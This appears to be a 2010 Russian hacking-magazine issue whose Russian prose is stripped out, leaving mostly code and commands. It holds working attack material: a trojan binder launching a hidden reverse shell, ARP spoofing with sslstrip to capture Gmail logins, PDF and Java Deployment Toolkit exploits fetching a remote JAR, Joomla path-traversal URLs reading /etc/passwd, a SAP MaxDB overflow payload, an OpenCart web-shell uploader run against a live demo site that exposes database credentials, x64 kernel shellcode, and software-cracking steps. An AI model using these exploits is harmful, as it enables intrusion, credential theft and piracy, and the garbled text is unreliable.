BackTrack ( WiFi). rt2570 rt73 , .

:
.
,
, . , ?
,
- , , .
, crunch.
BackTrack .
2.4 .
:
sourceforge.net/projects/crunch-wordlist/

, ( stdout), , ,
DirBuster. ,
, ,
.
./crunch 4 6 -f charset.lst mixalpha-space -o START -c 100000

4 6 ,
-f charset.lst mixalpha-space charset.lst,
, .
-o START -c 500000 , 100000
.
, , , r.
, charset.lst , , , . ,
crunch. , :

crunch.
:

cDOGd9%
cDOGd9^
dDOGA1@
dDOGA1#


(-t), @ , % , ^ . wordlist.txt.

m. ,
:
./crunch 1 1 -m Happy Birthday Masha

:
rualpha=[]

, rualpha
crunch.
./crunch 7 7 -t @DOG@%^ ABCDabcd 1369 @#$%^ -o wordlist.txt

: PORTABLE-
.

:

, , ,
X 06 /137/ 10

MashaBirthdayHappy
MashaHappyBirthday
BirthdayMashaHappy

. portable- .
, , , . ThinApp
( Thinstall) VMWare.
-, 0 -
, , Win7 64- ,

041

3.,
.
: ThinApp
, , ,
, . ,
exe .
7, 8 IE XP IE6
(. ).
. : , .
.
1. ThinApp;
2. ThinApp Setup Capture
;
3. , ;
4. ;
5. ;
6. - ThinApp;

:
EXE-

:
msfpayload, , msfencode (
Metasploit), - exe-.
: exe- ,
, , , :)...
. , ,
. .
, IExpress. , , .
:

7. , exe-
;
8. ;
9. , ;
10. ;
11. exe- ;
12. !

, ThinApp .
Package.ini ##Attributes.ini
build.bat
, Package.ini :
[Isolation]
DirectoryIsolationMode=Full


.

, .

5. (
);
6. ;
7. (ff1.
exe);
8. NoRestart;
9. .

1. (reverse.exe) ;
2. sbd.vbs :
Set wshshell = WScript.CreateObject(WScript.Shell)
wshshell.run calc.exe,1, False
wshshell.run reverse.exe,0,False

, Visual Basic,
exe-. , wshshell.run:
1. ;
2. , 0 , 1
( );
3.
.

iexpress ( iexpress)
:
1. ;
2. ;
3. ;
4. , (sbd.vbs,
reverse.exe, calc.exe);

042

IExpress

: ff1.
sed ff1.exe.
ff1.sed AppLaunched ,
vb-:
AppLaunched=cscript sbd.vbs

iexpress SED (
X 06 /137/ 10

iexpress).
. sed-,
.

, ,
18 21 41.

: PCAP

:
, pcap-
( ), .
, ,
html. ,
, .
, Win NetworkMiner.
, pcap-
, . ,
, .
, Back Track 4,
foremost tcpxtract. ,
.
:
foremost -i dump.pcap

-i dump.pcap pcap- .

:
GMAIL ,

:
, Black
Hat DC 2009 sslstrip.
,
, , ,
, .
:
1. sslstrip;
2. arpspoof.

BackTrack, .
:
1)192.168.0.1 ;
2)192.168.0.101 ;
3)192.168.0.102 .

, :
arpspoof -i eth0 -t 192.168.0.101 192.168.0.1

-
ARP-, MAC- .
ARP- ,
, , MAC-. , , 192.168.0.1
- , ,
. ,
.
, , :
X 06 /137/ 10

NetworkMiner
/etc/foremost.conf.

echo "1" > /proc/sys/net/ipv4/ip_forward

- , HTTP FTP-,
, . ,
.
,
HTTPS c SSL TLS. ?
HTTPS- - HTTP/
HTTPS -.
, sslstrip, ,
HTTP-, sslstrip
Gmail .
, -, HTTP-
.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j
REDIRECT --to-port 8080

TCP-, 80 ,
8080.
sslstrip ( -l) 8080 ,
sslstrip.log ( -a):
sslstrip -a -l 8080

sslstrip.log.
,
, , HTTPS-
.. ,
sslstrip , Gmail,
.
0.2 ( BT4),
0.7. , 0.7. z

043


, Digital Security dookie@inbox.ru


. ,
. , ,
, , . ,
, , , GET,
( ), , , , .

JAVA. , .

Joomla. .

01


PDF

CVE
CVE-2010-1239

TARGETS
Foxit Reader 3.2.1.0401

BRIEF
(Didier Stevens)
,
PDF Acrobat Reader Foxit Reader.
.
PDF ,
. , . , Acrobat Reader
,
(,
,
).

EXPLOIT
, ?
/Launch.

044

Joomla. .

, PDF,
,
PostScript. , ;
/Action, Launch. ,
. .
8 0 obj
<<
/Type /Action
/S /Launch
/Win
<<
X 06 /137/ 10

- .

PDF-.

/F (calc.exe)
/P (\nTo continue viewing the encrypted
content\nplease click the Dont show this
message again box\nand press OK!)
>>

F1

>>
endobj

02

JAVA DEPLOYMENT TOOLKIT

X CVE
CVE-2010-1423

8 ( ),
,
Action Launch. /F ,
/P ,
Acrobat Reader.
, /P,
:
/F (cmd.exe)
/P (/Q/C echo text>file)

,
Acrobat Reader.
PDF- .

SOLUTION
Foxit ,
. Adobe,
PDF- Trust Manager. , ,
...
X 06 /137/ 10

TARGETS
Java SE 6 update 10 update 20

BRIEF
. Sun Oracle. ,
HTML- JAR-
DLL.
.
,
Linux ( ). . Java Deployment Toolkit,
Java-
Web.

EXPLOIT
-, (Tavis Ormandy)
. JAR-,

045

ROP .

.
FireFox Internet Explorer. :
/*http://lock.cmpxchg8b.com/calc.jar JAR*/
var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";
/*MIME , */
var o = document.createElement("OBJECT");
var n = document.createElement("OBJECT");
o.type = "application/npruntime-scriptableplugin;deploymenttoolkit";
n.type = "application/java-deployment-toolkit";
document.body.appendChild(o);
document.body.appendChild(n);
/* ,
*/
try {
// Old type
o.launch(u);
} catch (e) {
// New type
n.launch(u);
}

IE :
/*http://lock.cmpxchg8b.com/calc.jar JAR*/
var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar
none";
/* , ID*/
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000ABCDEFFEDCBA";

046

/* */
o.launch(u);

, launch. javaws.exe .
J-jar , JAR. .

(Ruben Santamarta). , DLL,
JAR. J-jar ,
JXXaltjvm. javaws.exe, ,
, .
, SUN:
if (browser == 'MSIE')
{
document.write('<' +
'object classid="clsid:8AD9C840-044E-11D1-B3E900805F499D93" ' + 'width="0" height="0">' +'<' +
'PARAM name="launchjnlp" value="' +
jnlp + '"' +
'>' + '<' + 'PARAM name="docbase" value="' +
jnlpDocbase + '"' + '>' + '<' + '/' + 'object' +
'>');
}
else if (browser == 'Netscape Family')
{
document.write('<' +
'embed type="application/x-java-applet;jpiversion=' +
deployJava.firefoxJavaVersion + '" ' +
'width="0" height="0" ' +
'launchjnlp="' + jnlp + '"' +
X 06 /137/ 10

.
. ,
Google.

egg-hunter . ?

'docbase="' + jnlpDocbase + '"' +


' />');

http://[SITE]/index.php?option=com_sebercart&view=../.
./../../../../../../../../etc/passwd%00
http://[SITE]/index.php?option=com_powermail&controlle
r=../../../../../../../../../../etc/passwd%00
http://[SITE]/index.php?option=com_news_portal&contro
ller=../../../../../../../../../../etc/passwd%00
http://[SITE]/index.php?option=com_awiki&controller
=../../../../../../../../../../../../../../../etc/
passwd%00
http://[SITE]/index.php?option=com_jukebox&controller=
../../../../../../../../../../etc/passwd%00
http://[SITE]/index.php?option=com_datafeeds&controlle
r=../../../../../../../../../../etc/passwd%00

docbase launchjnlp.

SOLUTION
Oracle, ,
, .
, ,
, , , ,
Oracle ,
, javaws.exe.

03

JOOMLA

TARGETS

com_news_portal version 1.5.x


com_awiki
com_sebercart version 1.0.0.12
com_powermail version 1.5.3
com_jukebox version 1.7
com_datafeeds version 880

, controller.
, ,
JRequest::getVar(). :
// Require specific controller if requested
if($controller = JRequest::getVar('controller')) {
require_once (JPATH_COMPONENT.DS.'controllers'.
DS.$controller.'.php');
}

require_once, $controller.
JRequest::getVar() HTML-.

SOLUTION
,
,
"./".

04

STR_
TRANSLITERATE()

TARGETS
PHP 6.0 Dev

BRIEF
Web- ,
- Joomla
. exploit-db.com Web . - Joomla. -
AntiSecurity, DevilZ TM Valentin.
AntiSecurity
.
Joomla. ,
. ,
( , , ). ,
Joomla
. , Joomla ,
. OSSIM
PhpMyAdmin RoundCube Webmail.

BRIEF

EXPLOIT

EXPLOIT

, ,
. LFI-, -

PHP-,
-, .. 4

X 06 /137/ 10

PHP 6.0.

, . .
Pr0T3cT10n. , ,
, , -
PHP 6.0 Dev. , PHP-
str_transliterate(),
GET/POST-. php.
ini , unicode .
, .
, ,
DEP ASLR. , ,
. ,
(Matteo Memelli) .

047

-, .

( , ).
base64.
, GET-
PHP-. DEP ASLR.
. ,
ASLR, , ,
,
. - ,
-
(ROP). .
, , RET.
, RET
( ) ,
, RET.
, -.
ASLR DEP,
-, . - .
WriteProcessMemory,
-, , .text
. , . -
ROP,
(.text ASLR). WriteProcessMemory.
- . ,
kernel32.dll, - ASLR.
, . . , ,
, : ,
WriteProcessMemory. , Apache
. ...
, ,

048
48

, ()
, . , , . ,
. ASLR , ,
-. , ,
, .
. , Windows XP ,
. XP ASLR
, :
http://[SITE]/pwnPhp6.php?off_s=34&pos_
s=124&rnd=0&off_e=15&pos_e=128

WriteProcessMemory.
DVD.

SOLUTION
:
1. ;
2. PHP 6.0 Dev;
3. ;
4. Unicode.

05

SAP MAXDB

CVE
CVE-2010-1185

TARGETS
SAP MaxDB 7.7.06.09
X 06 /137/ 10

, SYSTEM.

packet = (

BRIEF
SAP MaxDB
, ,
, - .
(AbdulAziz Harir) Insight Technologies.
TippingPoint Zero Day Initiative. , .
, S2 Crew, ,
. 4444
.

EXPLOIT
, TCP- , 7210 .
. ,
, , .
, ,
. , ,
, .
:

"\x63\x00\x00\x00\x03\x2f\x00\x00\x01\x00\x00\x00"
"\xff\xff\xff\xff\x00\x00\x04\x00\x63\x00\x00\x00"
"\x00\x02\x4b\x00\x04\x09\x00\x00\x44\x20\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff"
"\x6d\x61" + ret + "\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x07\x49" + "A"*5000 + "T00WT00W" + sc
+ "\x41" * 2500 + egghunter + "\x90"*2500)

egg-hunter
- ( egghunter),
- ( sc).
T00WT00W. egg-hunter .
, ,
.
.
. , ,

. egg-hunter -, , . ,
egg-hunter -,
-. , .

SOLUTION
ret = "\x08\xf1\xa0\x00" # HC
X 06 /137/ 10

SAP MaxDB . z

049


Anonim

,
.
casualis, . , ,
, , , -
. .
, . !

, .
, , .

(, , ). ,
,
. ,

050

.

,
. 60 , ,
, .
, ,
.
,
, ,
.
X 06 /137/ 10


, nsgame.dat

,
,
. , .
,
.
,
: , ;
,
. Total Commander

. ,
? , ,
. Delphi 7.
,
. ...

, , ,
, ... !

. ,
, .
,
. .
*.tmp.
, , , .
, . , .
exe
(, , ).

,
. , ,

. .
.

NevoSoft'a
, , *.tmp. ,
, . , *.tmp
nsgame.dat,
. , nsgame.dat *.tmp
.
, ,
.
X 06 /137/ 10

,
. ,
, . Total Commander .
, :
2 .
, , ?
.
( ) XOR-.
,
XOR. ,
.
? .
, .
Crypted = uncrypted XOR key;
Key = crypted XOR uncrypted

,
$43000

.
XOR .
, ,
. XOR
256 ,
.
var
i, o: TFileStream;
bi, bo:byte;
x, ii, cc:integer;
begin
if open.Execute then
begin
SetCurrentDir('C:\ NevoSoft\Peacecraft\
game');
//
if not(fileexists('nsgame.dat')) then exit;
i:=TFileStream.Create('nsgame.dat', fmOpenRead);
o:=TFileStream.Create(open.FileName, fmOpenRead);
x:=0; ii:=0; cc:=0;
// 256
for x:=0 to 255 do
begin
i.read(bi,1);
o.read(bo,1);

051

key.Caption:=format('%s %x', [key.Caption, (bi


xor bo)]);
inc(cc);
if cc mod 8 =0 then key.Caption:=key.
Caption+#13#10;
end;
i.Free;
o.Free;
end;

, , , -
: 4 . , ,

. ?!
.
PE- 2
XOR. :
XOR 2 , 4
? 3- 4- $00.
const
ckey = #77#90; // PE-
begin
i:=TFileStream.Create(FileName, fmOpenRead);
for x:=1 to 2 do
begin
i.Read(tmp,1);
tmp:=ord(ckey[x]) xor tmp;
key:=key+chr(tmp);
end;
key:=key+#0#0;

-,
.

,
,

, , ...

. , . ...

052

X 06 /137/ 10

inc(ii);
i.Read(bi, 1);
bo:=bi xor ord(key[ii]);
buffer.Write(bo,1);
inc(x);
if ii=4 then ii:=0;
end;
o.Write(Buffer.Memory^, Buffer.size);
i.Free;
o.Free;
buffer.Free;
showmessage('Wrapping done');
end;


XOR
nsgame.dat

procedure wrap(filename:string);
var
i, o: TFileStream;
bi, bo, tmp:byte;
x, ii:integer;
key:string[4];
buffer:TMemoryStream;
const
ckey = #77#90;// PE-
begin
if not(fileexists(filename)) then exit; // =)
i:=TFileStream.Create(filename, fmOpenRead);//
o:=TFileStream.Create(ChangeFileExt(filename,
'.exe'), fmCreate);//
buffer:=TMemoryStream.Create;
for x:=1 to 2 do // -
begin
i.Read(tmp,1);
tmp:=ord(ckey[x]) xor tmp;
key:=key+chr(tmp);
end;
key:=key+#0#0;
i.Seek(0,soFromBeginning);
x:=0; ii:=0;
while i.Position<i.Size do //
begin
X 06 /137/ 10

...
- . , ,
?! !
. ,
.
Total Commander , , .
.
, Total
Commander , , $43000,
.
, ,
, $43000 .
, $43000 .
while i.Position<i.Size do
begin
inc(ii);
i.Read(bi, 1);
if x<$43000 then
begin
bo:=bi xor ord(key[ii]);
buffer.Write(bo,1);
end
else
buffer.Write(bi,1);
inc(x);
if ii=4 then ii:=0;
end;

(,
, , ,
). ;
. , NevoSoft' , .
, ,
.


IT-,

. , ,
, , ;
,
. . 272-274
! :) z

053


Ams

OpenCart
- OPENCART

, , . -
, , , .
,
, PHP-. , ? ,
- OpenCart, ,
.

,
.

- OpenCart
1.4.6. -
.
,
,
:
eval("?" .">$str");

- , .

system/helper/dompdf/include/dompdf.

054

cls.php, 276 .
,
load_html(), $str,
. ,
,
, DOMPDF.
, dompdf,
;
. ,
dompdf.php! , ,
, .
,
$_GET['input_file']. ,
, ,

.
. ,
,
:
printf("File: %s, line: %d<br/>",
__FILE__, __LINE__);

, : input_
file, load_html_file()
DOMPDF. , ,
file_get_contents(),
load_html().
X 06 /137/ 10

OpenCart
- .
,
,
.
, . , , .
. :
http://localhost/h/opencart_v1.4.6/upload/
system/helper/dompdf/dompdf.php?input_
file=../../../../../../etc/passwd

DOMPDF

, /etc/passwd PDF-.
, ,
.

, , - .
eval()
PHP-.
, ,
.

HTTP://WWW
links
opencart.com

OpenCart.
us3.php.net/manual/en/features.fileupload.put-method.
php PHP
PUT.
php.net/manual/en/
wrappers.data.php
PHP
.
archives.neohapsis.
com/archives/fulldisclosure/2009-07/0417.
html

DOMPDF.
digitaljunkies.ca/
dompdf/index.php
DOMPDF.
exploit-db.com/
papers/260
RFI/LFI CWH
Underground.

X 06 /137/ 10

055

dompdf.php

. PHP 5.2.0 data:, . data
127 ,
, .
, Perl. ,
Perl ,
.
, :

$cmd = encode_base64($cmd
. '| sed -e :a -e \'$!N;s/\
n/<br\/>/;ta\'');

$cmd , , ls -la.
,
. sed , <br/>,
PDF HTML.
:

PDF-

ls -la | sed -e :a -e '$!N;s/\


n/<br\/>/;ta'


sed, .
base64 .
my $tobase64php = "<?php \@
system(base64_decode('$cmd'));";
my $payload = 'data:;base64,' .
encode_base64($tobase64php);

,
PHP.

, PDF. : ,
?

. OpenCart
, . dompdf exploit ( -
) - .
Benj Carson YGN Ethical Hacker Group
,
,
PDF ( ).
, ,
OpenCart .

, ..?

, ,
.
, ,

056

X 06 /137/ 10


-. , ?
, ! , ,

, . ,
. ,
. (
) .
, .
,
. , :
demo.opencart.com/system/helper/dompdf/
dompdf_main.php

, .
, .
. :
perl dompdf.pl -u=http://demo.opencart.com/
-c='ls -la'

PDF'. ,
: PDF-.
,
. ,
PHP:

, PHP
.

DVD

,
. ? :
http://demo.opencart.com/system/
helper/dompdf/dompdf.php?input_
file=../../../../../../../etc/passwd

PDF- . , .
.
OpenCart config.php. ,
, PHP-,
- , . , URL
:

dvd

,

, -
,


OpenCart (
)55

http://demo.opencart.com/system/helper/
dompdf/dompdf.php?input_file=php://

URL file-access is disabled in the server


configuration in...

--. ,
PHP allow_url_fopen=off.
data , , , RFI
. , ,
.
,
, ,
. allow_url_fopen=off,
. ,
X 06 /137/ 10

057

filter/convert.base64-encode/
resource=../../../config.php

,
PHP 5.0.0. ,
, base64.
,
. , ,

PDF. , :
<?php
...
// DB
define('DB_DRIVER', 'mysql');
define('DB_HOSTNAME',
'localhost');
define('DB_USERNAME',
'opencart_user');
define('DB_PASSWORD',
'|l$Ik|S;15Yf');
define('DB_DATABASE',
'opencart_demo');
define('DB_PREFIX', '');
?>

MySQL.

3306. :
nmap 85.13.246.138 -p 3306

nmap , .
:

mysql -h 85.13.246.138 -u
opencart_user -p

. ,
.
,
:
,
, .
. .
.
data
, ,
?
.
PHP-,
. ,

.
.
.
PHP,
. .
: , PDF
PHP- .
, .
PHP-
. ,
- apache, /proc
. .

, .
, . ,
.

PHP
. ,
, php://input.
POST ,
- PHP.
, :
,
POST-. :
http://.../dompdf.php?input_
file=php://input

Perl-,
.
. , POST, URL;
, .
, :
var=%3C%3Fphp%20echo%28999%29%3B

,
. ,
.
php://input
PUT.
, POST, . ,

PHP PUT

058

X 06 /137/ 10

:)
POST PUT,
- , PHP-. ?
, ,
.
PUT php:/input,

, .
:
my $tmp_shell = <<'B64';
<?php

PHP-. PUT. ,
.
.
, ,
, allow_
url_fopen=off.
, .

.
:

if(@move_uploaded_file($_FILES['fi']
['tmp_name'],$_FILES['fi']['name']))
{
echo(9);

www-data@sd:/var/www/lib$ ./e.pl
-u=http://demo.opencart.com/ -s=./
logs.php

@unlink(__FILE__);
}
B64
my $shell64 = encode_base64(

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
www.opencart.com exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$tmp_shell);
my $tophp = sprintf(
"<?php eval(base64decode('%s'));",
encode_base64(
"file_put_contents('i.php',
base64_decode('$shell64'));")
);
# Stage 1, exploiting DOMPDF
vulnerability.

[~] Exploiting http://demo.


opencart.com/
[+] Ok, uploading shell...
[+] Ok, response[9], checking for
shell.
[+] Ok, shell: http://demo.
opencart.com/system/helper/dompdf/
newi.php

my $req = PUT "$url/dompdf.


php?input_file=php://input", Content
=> $tophp;

$tmp_shell
-.
(
) . -
i.php
X 06 /137/ 10

, ,
. ,
,
PHP,
PHP-, .

, . ,

,
, ,
.
,
.
, (1.4.6) .
,
.

?
,
. , ,
,

. ,
: , .
, , ,
.
. ,
,
,
. ,
. .
Google. ,
, ,
. ,
, ,
.
, ,
. z

059


r0064 r0064@mail.ru

-
RING0-SHELLCODE
WINDOWS X64

, 64- Windows
. , ,
. , 64-
- ,
.
, . !

.
x64 - ring3 (inj3ct0r.com/exploits/9740).
.
, ,
- :
/ .

( - ring0)
Macro Assembler x64 (ml64). WDK.
WDK :
microsoft.com/whdc/DevTools/WDK/WDKpkg.mspx.

FASM (install_drv.
exe, start_drv.exe .). ,
( ).
: flatassembler.net/examples/win64_drivers.zip.
Microsoft Debugging
Tools (64- ) + livekd ( ).
Microsoft: microsoft.com/whdc/devtools/debugging/
install64bit.mspx technet.microsoft.com/ru-ru/sysinternals/
bb897415.aspx.
, DbgView.
( ) 64- ,

060

, , livekd (technet.microsoft.com/en-us/sysinternals/
bb896647.aspx).
IDA x64.
, ,
PE ,
64- .
64- :).

, . ,
.
1. (aka ntoskrnl);
2. ntoskrnl;
3. ;
4. Profit!
, ...

.
:
Processor Control Region ( PCR);
sidt;
msr ( - ).
,
X 06 /137/ 10

DbgView
x64 -,
inj3ct0r.com
Stack = 0xFFFFF8000011F000
13: fffff8000102dbc0 nt!KiXmmException
1f: fffff800010279e0 nt!KiApcInterrupt
2c: fffff8000102dd40 nt!KiRaiseAssertion

DVD

2d: fffff8000102de00 nt!KiDebugServiceTrap

ml64
. ,
; . , !

2f: fffff80001067c70 nt!KiDpcInterrupt

20+ , .
, ,
idt. KPCR.IdtBase. PCR ,
, livekd.

dvd


DVD.

0: kd> dt _KPCR

nt!_KPCR

, ,
- , ntoskrnl.
, , int 3 idt.
, . ,
. x64 idt Patch Guard, .

livekd !idt, .

+0x000 NtTib

: _NT_TIB

+0x000 GdtBase

: Ptr64 _KGDTENTRY64

+0x008 TssBase

: Ptr64 _KTSS64

+0x010 PerfGlobalGroupMask : Ptr64 Void


+0x018 Self

: Ptr64 _KPCR

+0x020 CurrentPrcb

: Ptr64 _KPRCB

+0x028 LockArray

: Ptr64 _KSPIN_LOCK_QUEUE

+0x030 Used_Self

: Ptr64 Void

+0x038 IdtBase

: Ptr64 _KIDTENTRY64

+0x040 Unused

: [2] Uint8B

+0x050 Irql

: UChar

0: kd> !idt

+0x051 SecondLevelCacheAssociativity : UChar

Dumping IDT:

+0x052 ObsoleteNumber

: UChar

00: fffff8000102c400 nt!KiDivideErrorFault

+0x053 Fill0

: UChar

01: fffff8000102c4c0 nt!KiDebugTrapOrFault

+0x054 Unused0

: [3] Uint4B

02: fffff8000102c600 nt!KiNmiInterrupt

+0x060 MajorVersion

: Uint2B

+0x062 MinorVersion

: Uint2B

Stack = 0xFFFFF8000011D000
03: fffff8000102c940 nt!KiBreakpointTrap

+0x064 StallScaleFactor : Uint4B

04: fffff8000102ca00 nt!KiOverflowTrap

+0x068 Unused1

: [3] Ptr64 Void

05: fffff8000102cac0 nt!KiBoundFault

+0x080 KernelReserved

: [15] Uint4B

06: fffff8000102cb80 nt!KiInvalidOpcodeFault

+0x0bc SecondLevelCacheSize : Uint4B

07: fffff8000102cd40 nt!KiNpxNotAvailableFault

+0x0c0 HalReserved

: [16] Uint4B

08: fffff8000102ce00 nt!KiDoubleFaultAbort

+0x100 Unused2

: Uint4B

+0x108 KdVersionBlock

: Ptr64 Void

09: fffff8000102cec0 nt!KiNpxSegmentOverrunAbort

+0x110 Unused3

: Ptr64 Void

0a: fffff8000102cf80 nt!KiInvalidTssFault

+0x118 PcrAlign1

: [24] Uint4B

0b: fffff8000102d040 nt!KiSegmentNotPresentFault

+0x180 Prcb

: _KPRCB

Stack = 0xFFFFF8000011B000

0c: fffff8000102d140 nt!KiStackFault


0d: fffff8000102d240 nt!KiGeneralProtectionFault
0e: fffff8000102d340 nt!KiPageFault
10: fffff8000102d680 nt!KiFloatingErrorFault
11: fffff8000102d7c0 nt!KiAlignmentFault
12: fffff8000102d880 nt!KiMcheckAbort
X 06 /137/ 10

,
64 , ( 32- ) . ,
IdtBase
_PCR.

061

, , x64 PCR - (
livekd). KPCR?
hal.dll HalInitializeProcessor.
.text:000000008001F240

public HalInitializeProcessor

.text:000000008001F240

HalInitializeProcessor proc near

; DATA XREF: .pdata:000000008004C804 o


.text:000000008001F240
.text:000000008001F240 var_28 = byte ptr -28h
.text:000000008001F240 var_20 = byte ptr -20h
.text:000000008001F240 var_18 = qword ptr -18h
.text:000000008001F240 arg_0 = byte ptr

.text:000000008001F240
.text:000000008001F240

push

rbx

.text:000000008001F242

sub

rsp, 40h

.text:000000008001F246

mov

r8, gs:18h

.text:000000008001F24F

mov

r10d, ecx

.text:000000008001F252

mov

r9d, 1

.text:000000008001F258

mov

rax, [r8+20h]

.text:000000008001F25C

mov

ecx, ecx

.text:000000008001F25E

mov

[rax+4], r10b

.text:000000008001F262

shl

r9, cl

.text:000000008001F265

lea

.text:000000008001F26C

or

cs:HalpActiveProcessors, r9

.text:000000008001F273

cmp

cs:HalpStaticIntAffinity, 0

.text:000000008001F27A

mov

dword ptr [r8+64h], 64h

.text:000000008001F282

mov

[rax+r10*8], r8

rax, HalpProcessorPCR

, PCR
gs:[18h]. 32- fs,
gs :).
, idt? int 3 ( , ),
, . , , x64 . ?
( )
(AMD, Intel), livekd.
! dt _KIDTENTRY64, .
0: kd> dt _KIDTENTRY64
nt!_KIDTENTRY64
+0x000 OffsetLow

: Uint2B

+0x002 Selector

: Uint2B

+0x004 IstIndex

: Pos 0, 3 Bits

+0x004 Reserved0

: Pos 3, 5 Bits

+0x004 Type

: Pos 8, 5 Bits

+0x004 Dpl

: Pos 13, 2 Bits

+0x004 Present

: Pos 15, 1 Bit

+0x006 OffsetMiddle

: Uint2B

+0x008 OffsetHigh

: Uint4B

+0x00c Reserved1

: Uint4B

+0x000 Alignment

: Uint8B

0: kd>

, ( Offset). ,
, 64-.
, , , . , .
; _KPRC
mov rcx, gs:[18h]
; +0x038 IdtBase
: Ptr64 _KIDTENTRY64
mov rcx,qword ptr[rcx+38h]

062

livekd
livekd -w

; int 3
; 16 . 0
; INT_X = 3
add rcx,16*INT_X
; OffsetLow, OffsetMiddle
OffsetHigh KIDTENTRY64
mov r11,qword ptr [rcx]
and r11,0FFFFh
mov rcx, qword ptr [rcx+4]
; rcx int 3 (Offset)
mov cx,r11w
and cx,0F000h ; 12
search_loo:
; ntoskrnl
cmp word ptr [rcx],'ZM'
jnz nxt
sub rax,rax
; eax -> PE offset
mov eax,dword ptr [rcx+3Ch]
; PE
cmp word ptr [rcx+rax],'EP'
jz founded
nxt:
; ...
sub rcx,1000h ;
jmp search_loo
founded:
...

idt. ,
,
32- Windows.
idtr.
( 2 , ),
8 .
idtr x64 :
typedef struct _IDTR
{
USHORT usLimit;
ULONGLONG uBase;
}IDTR;

idt, sidt , . 12 , 1000h,


MZ PE.

X 06 /137/ 10


KiSystemCall64 ( 64- ) msr
lstar ( 0xC0000082). (, ,
) syscall.
...
sub rcx,rcx
mov ecx,0C0000082h ; msr ecx
rdmsr ; - lstar
...

edx:eax
KiSystemCall64. ,
lstar. , syscall long mode ( ,
64- ) 2 msr : cstar
lstart compatibility 64-bit mode .
? msr cstar (0xC0000083) ,
ntoskrnl! KiSystemCall32.
.

WINDOWS X64

.
PE32+, .
, .
- win32, , ,
IMAGE_NT_HEADERS 78h. win64 88h.
PE32+ PE32.
_IMAGE_NT_HEADERS64:
typedef struct _IMAGE_NT_HEADERS64 {
DWORD Signature;
IMAGE_FILE_HEADER FileHeader;
IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

,
- . IMAGE_EXPORT_
DIRECTORY ( IMAGE_DOS_HEADER) ,
.
PE32+:
...
shellcode_data:
db "ZwCreateFile",0
;...
;
; export directory
lea r11,[rcx+rax+88h]
sub r12,r12
; export directory rva
mov r12d,dword ptr [r11]
; IMAGE_EXPORT_DIRECTORY
add r12,rcx
sub r8,r8
;number of functions
mov r8d,dword ptr [r12+18h]
sub r9,r9
; AddressOfNames
mov r9d,dword ptr [r12+20h]
; function names virtual address
add r9,rcx
dec r8
; func_name
X 06 /137/ 10

mov rdi,shellcode_data
next_function:
sub rsi,rsi
mov esi,dword ptr [r9+r8*4]
add rsi,rcx
; ,
cmpsb
cld
push rdi
; rcx cmpsb
push rcx
; cmpsb
mov rcx,12
;
repe cmpsb
jz founded_f
pop rcx ;
cmpsb
pop rdi
;
dec r8
jnz next_function
jmp not_found
founded_f:
pop rcx
pop rdi
sub rbx,rbx
; AddressOfNameOrdinals RVA
mov ebx,dword ptr [r12+24h]
;NameOrdinals VA
add rbx,rcx
; index in address table into r8
mov r8w, word ptr [rbx+r8*2] ;
r8
and r8d,0FFFFh
sub rbx,rbx
mov ebx,dword ptr [r12+1Ch]
add rbx,rcx
sub r12,r12
mov r12d, [rbx+r8*4] ;
r12 RVA
; rcx ZwCreateFile
add rcx,r12
not_found:
...

, . -,
, .
-, .
ml64,
DbgView.
livekd.
:
u _

- 64- . . ,
, 64-
-. ,
rip-relative addressing . ,

:). , ,
, ! z

063


Maksim.Burnin@gmail.com; 2FED

BUMPTOP -

, ,
. BumpTop
,
. , , , 3D.

- BumpTop(), .
, , . ,
BumpTop , - ,
.

, . C
thepiratebay.org, BumpTop
1 - 2008 . ,
BumpTop. ,
. , , ,
bumptop.exe IDA
pro. IDA ,
. .
, , -

064

. Strings (Shift+F12)
Please enter your invite code:,
. .rdata:00647D1C,
. jump to xref operand(x), , .
. , , , , (F2) (F9).
, (F8) 0041B7A7. ...
! .
, , .
,
.text:0041B350, , (jump to xref
operand). , ,
:
.text:004862B4
cmp byte ptr [eax+8Bh], 0
; 0
.text:004862BB
jnz short loc_4862C2
X 06 /137/ 10

Bumptop beta 12

;
.text:004862BD
call sub_41B350 ;

, ,
. JNZ (, ), ,
- , ZF (
, JZ JNZ) 1
0. , General Registers Run(f9). Bumptop,
,
, !
,
. bumptop.exe
HIEW, <enter> . F5, (.004862BB)
<enter>.
F3 F2
JNE JE (JNE/JE JNZ/JZ). , ,
(F9) !
? BumpTop
. , , . Yes.


BUMPTOP RELOAD...

3D Desktop'a , , , 5-10 beta 12 BumpTop'a. ,


, Yes.
3D-
,
: Authorization failed! Please enter your invite
code. IDA BumpTop.exe,
...
X 06 /137/ 10

0068A2CC Authorization failed! ,


0041FF23. <PgUp> , .
<X> <Enter>
; 0042258C. . , ,
ZF , .
, ...

, . 10 .
,
, . , 0041EE54. :
.text:0041EE2D test al, al
;
.text:0041EE2F jnz loc_41EED2
;
.text:0041EE35 push ecx
.text:0041EE36 mov ecx, esp
.text:0041EE38 mov [esp+0ECh+var_C0], esp
.text:0041EE3C push offset aAuthorizationf
; AuthorizationFailed
.text:0041EE41 call ds:??0QString@@QAE@PBD@Z
.text:0041EE47 lea eax, [esp+0E8h+var_B0]
.text:0041EE4B push eax
.text:0041EE4C mov [esp+0ECh+var_4], 2Fh
.text:0041EE54 call sub_422550
;

,
JNZ 0041EE2F, ,
, ZF. , ! HIEW,
, , JNZ JZ,
0041EE2F. BumpTop ,
12 , BumpTop Beta 19!

.
3D Desktop' .

,
,
beta.
BumpTop .
. z

065


icq 884888, http://snipper.ru

$2.700.000.000 , ?
.

,
.


,
.
, sam-worthington.
net. 8 ,
30
,
,
:).

, ,
. samworthington.net
-,
:).
,
.
WordPress
, , ,
2.9.2 ( html-

066

-
Generator). , -
.

Coppermine Photo Gallery (samworthington.net/gallery/). ,
,
html- <!--Coppermine Photo Gallery 1.4.26
(stable)-->.
, ,
Powered free by PHPmotion,
videos.
sam-worthington.net. www.phpmotion.com,
,
YouTube,
.
PHPmotion, :
, -
. , -
,

images
